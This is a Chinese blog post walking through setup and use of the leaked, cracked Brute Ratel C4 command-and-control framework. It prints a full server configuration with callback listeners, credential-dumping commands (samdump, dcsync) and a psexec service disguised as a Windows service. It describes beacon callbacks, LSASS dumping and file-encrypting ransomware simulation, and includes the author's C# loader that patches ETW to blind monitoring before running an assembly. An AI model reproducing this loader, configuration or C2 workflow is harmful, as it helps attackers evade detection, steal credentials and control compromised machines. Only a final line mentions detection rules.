咕咕咕,我是鸽子,我也不想写东西的啊,可是领导他请吃KFC诶。

bruteratel介绍

因为前几天bruteratel泄露了,VT可下,于是给大家简单分享一下它的使用方法。bruteratel简称BRC4是一个印度老哥开发的C2,泄露的版本为1.2.2,最新应该是1.2.7,官网地址为:https://bruteratel.com/

像CobaltStrike一样是一个三端的C2,UI使用QT开发,网上泄露的版本为未破解版,无法直接使用需要进行破解,演示版本为破解后版本,该C2主打bypass、evasion,作者推特也是日常分享该C2的绕过EDR的视频,可能是用户体量较小的原因,该C2确实具有不错的免杀效果,但是在ioa为主ioc为辅的今天再强的C2也免不了被查杀的下场。

bruteratel 使用

该C2目前只有Linux和ARM版本,服务端与客户端均为二进制文件,UI因为QT的原因需要安装一些依赖库(高版本可能不需要这个过程)作者也给出了安装脚本:

sudo apt-get install libqt5webenginewidgets5 libqt5websockets5
## server dependenciessudo apt-get install nasm mingw-w64

安装后可以启动Client:

然后启动Server:

目前Server提供了两种模式,分别是socks代理和普通Server模式,一般来说我们可以直接使用Server模式使用,Server支持使用json格式的文件作为配置文件直接启动也支持命令行传递参数启动,如下:

 

包括使用的ssl证书文件,也可以使用作者给出的sh脚本直接生成。这里给出一个简单的配置文件参考:

{    "admin_list": {        "admin": "admin@123"    },    "auto_save": false,    "click_script": {        "Credential Dumping": [            "samdump",            "shadowclone",            "dcsync"        ],        "Discovery": [            "id",            "pwd",            "ipstats",            "psreflect echo $psversiontable",            "net users",            "scquery"        ]    },    "autoruns": [        "set_child searchprotocolhost.exe",        "sleep 1"    ],    "c2_handler": "0.0.0.0:8443",    "comm_enc_key": "WeiJeeWeiCufae2y",    "credentials": [        {            "creddomain": "darkvortex.corp",            "crednote": "Domain Admin Password",            "credpass": "admin@123",            "creduser": "administrator"        }    ],    "listeners": {        "json-c2": {            "append": ""}",            "auth_count": 1,            "auth_type": false,            "c2_authkeys": [                "abcd@123"            ],            "c2_uri": [                "en/ec2/pricing/",                "?locale=en"            ],            "die_offline": false,            "extra_headers": {                "content-type": "application/json"            },            "host": "172.16.219.1",            "is_random": true,            "os_type": "windows",            "port": "443",            "prepend": "{"channel":"",            "rotational_host": "172.16.219.1",            "ssl": true,            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",            "proxy": "https://192.168.0.150:8081"        },        "xml-c2": {            "append": "n    nn",            "auth_count": 1,            "auth_type": false,            "c2_authkeys": [                "abcd@123"            ],            "c2_uri": [                "previous-versions/windows",                "latest/developerguide/documents-batch-xml.html"            ],            "die_offline": false,            "extra_headers": {                "Content-Type": "application/xhtml+xml"            },            "host": "172.16.219.1",            "is_random": true,            "os_type": "windows",            "port": "80",            "prepend":"nn    n        Gambardella, Matthewnn        Computern        44.95n        2000-10-01n        ",            "rotational_host": "172.16.219.1",            "ssl": true,            "useragent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"        },        "doh-c2": {            "auth_count": 1,            "auth_type": false,            "c2_authkeys": [                "abcd@123"            ],            "c2_uri": [                "dns-query"            ],            "extra_headers": {                "Content-Type": "application/dns-message"            },            "checkinA": "8.8.8.8",            "die_offline": false,            "dnshost": "dns1.evasionlabs.com,dns2.evasionlabs.com",            "rotational_host": "dns.google",            "host": "172.16.219.1",            "idleA": "8.8.4.4",            "spoofTxt": "google-site-verification=wD8N7i1JTNTkezJ49swvWW48f8_9xveREV4oB-0Hf5o",            "is_random": true,            "os_type": "windows",            "port": "53",            "ssl": true,            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"        }    },    "payload_config": {        "main_smb": {            "c2_auth": "abcd@123",            "smb_pipe": "\\.\pipe\mynamedpipe",            "type": "SMB"        },        "main_tcp": {            "c2_auth": "abcd@123",            "host": "127.0.0.1",            "port": "10000",            "type": "TCP"        }    },    "psexec_config": {        "psexec_svc_desc": "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether universal apps installed from the Windows Store are declaring all of their permissions, like being able to access your telemetry, location or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user.",        "psexec_svc_name": "TransactionBrokerService"    },    "ssl_cert": "cert.pem",    "ssl_key": "key.pem",    "user_list": {        "brute": "brute123",        "ratel": "ratel123"    },    "register_obj": {        "boftest64": {            "arch": "x64",            "file_path": "server_confs/sample_bof/decltest64.o",            "description": "Sample BOF file to show x64 capabilities",            "artifact": "WINAPI",            "mainArgs": "NA",            "optionalArg": "NA",            "example": "decltest64",            "minimumArgCount": 1        },        "boftest86": {            "arch": "x86",            "file_path": "server_confs/sample_bof/decltest86.o",            "description": "Sample BOF file to show x86 capabilities",            "artifact": "WINAPI",            "mainArgs": "NA",            "optionalArg": "NA",            "example": "decltest86",            "minimumArgCount": 1        }    },    "register_pe": {        "seatbelt": {            "file_path": "server_confs/Seatbelt.exe",            "description": "Runs Seatbelt C# executable",            "artifact": "WINAPI",            "mainArgs": "NA",            "optionalArg": "NA",            "example": "seatbelt",            "minimumArgCount": 1        }    },    "register_pe_inline": {        "monologue": {            "file_path": "server_confs/InternalMonologue.exe",            "description": "Runs InternalMonologue C# executable",            "artifact": "WINAPI",            "mainArgs": "NA",            "optionalArg": "NA",            "example": "monologue",            "minimumArgCount": 1        }    },    "register_dll": {        "boxreflect": {            "arch": "x64",            "file_path": "server_confs/boxreflect.dll",            "description": "Loads a test reflective dll message box",            "artifact": "WINAPI",            "mainArgs": "NA",            "optionalArg": "NA",            "example": "boxcheck",            "minimumArgCount": 1,            "replace_str": {                "boxit": "\x00\x00\x00\x00\x00",                "!This program cannot ": "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",                "be run in DOS mode.": "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"            }        }    },    "webhook_listener": {        "json-c2": {        "badger_init": false,        "badger_log": false,            "webhook_host": "https://localhost:9443"        }    }}

各字段含义可自行查阅文档,本文非profile介绍文章,故不赘述。启动后便可以连接到Server进行操作:

 

主操作界面上手比较简单,C4profile为添加监听、配置的地方,包括设置psexec的服务名等(也可在配置文件中设置,虽然用处不大)

 

 

而server标签栏则是包含如下载文件查看、证书查看以及比较有趣的ATTACK映射:

 

 

然后我们添加监听,生成payload即可像Cs一样上线beacon,监听器各字段不在多说基本和CS区别不大

 

然后生成载荷:

 

运行后成功上线:

 

一样的可以通过help查看所提供的命令:

 

另外其提供了LDAP查看功能,可以直接进行LDAP查询。

 

以及一个勒索模拟功能Crypt Vortex,可以进行文件加密:

 

加密后对比:

 

而对于命令操作来说需要操作前设置一个Child进程:

 

然后便可使用相关功能,比如dumplsass(具作者所说该方法不调用MiniDumpWriteDump,且整个过程全部syscall化):

 

运行Csharp文件自动patch etw、amsi

 

 

自实现代码:

using System;using System.Reflection;using System.Runtime.InteropServices;
namespace Loader{    internal class Program    {        [DllImport("kernel32")]        private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
        [DllImport("kernel32")]        private static extern IntPtr LoadLibrary(string name);
        [DllImport("kernel32")]        private static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
        public static void PatchEtw()        {            IntPtr hNtdll = LoadLibrary("ntdll.dll");            IntPtr pEtwEventWrite = GetProcAddress(hNtdll, "EtwEventWrite");
            byte[] patch = { 0xc3 };
            _ = VirtualProtect(pEtwEventWrite, (UIntPtr)patch.Length, 0x40, out uint oldProtect);
            Marshal.Copy(patch, 0, pEtwEventWrite, patch.Length);
            _ = VirtualProtect(pEtwEventWrite, (UIntPtr)patch.Length, oldProtect, out uint _);        }
        private static void Main(string[] args)        {            Console.WriteLine("Inspect the AppDomains, then press any key...");            Console.ReadLine();
            PatchEtw();
            Console.WriteLine("ETW is patched! Recheck then press any key...");            Console.ReadLine();
            Assembly assembly = Assembly.LoadFrom(@"C:UsersExample.exe");            assembly.EntryPoint.Invoke(null, null);        }    }}

新版brc4中amsi、etw的绕过已经从patch改成了patchless,利用硬件断点进行bypass:https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/

支持bof加载:

 

外就是作者针对进程开发的一些功能了,比如列出模块、列出导出之类的:

 

自实现代码:

class ProcessModules    {        public void getModules()        {            Process myProcess = new Process();            //Get the process start information of notepad            ProcessStartInfo myProcessStartInfo = new ProcessStartInfo("notepad.exe");            //Assign 'StartInfo' of notepad to 'StartInfo' of 'myProcess' object.            myProcess.StartInfo = myProcessStartInfo;
            //Create a notepad            myProcess.Start();            System.Threading.Thread.Sleep(1000);            ProcessModule myProcessModule;            //Get all the modules associated with 'myProcess".            ProcessModuleCollection myProcessModuleCollection = myProcess.Modules;            Console.WriteLine("Properties of the modules associated with 'notepad' are:");            //Display the properties of each of the modules            for (int i = 0; i             {                myProcessModule = myProcessModuleCollection[i];                Console.WriteLine("The moduleName is " + myProcessModule.ModuleName);                Console.WriteLine("The " + myProcessModule.ModuleName + "'s File Name is: " + myProcessModule.FileName);                Console.WriteLine("The " + myProcessModule.ModuleName + "'s base address is: " + myProcessModule.BaseAddress);                Console.WriteLine("For " + myProcessModule.ModuleName + " Entry point address is: " + myProcessModule.EntryPointAddress);            }            //Get the Main module associate with 'myProcess'            myProcessModule = myProcess.MainModule;            Console.WriteLine("The Main Module associated");            Console.WriteLine("The process's main modulename is " + myProcessModule.ModuleName);            Console.WriteLine("The process's main modulename  File Name is: " + myProcessModule.FileName);            Console.WriteLine("The process's main modulename base address is: " + myProcessModule.BaseAddress);            Console.WriteLine("The process's main modulename Entry point address is: " + myProcessModule.EntryPointAddress);            myProcess.CloseMainWindow();
        }    }

 

针对内存的,设置内存分配方式,检测内存分配属性和线程执行方式:

 

 

额,不想写了,就这些吧,其实还有很多功能可以拿出来细说的,但我实在是太懒了,emmm,至于检测的话网上有现成的yara规则。

 

来源:千寻瀑

发表回复

后才能评论

评论(1)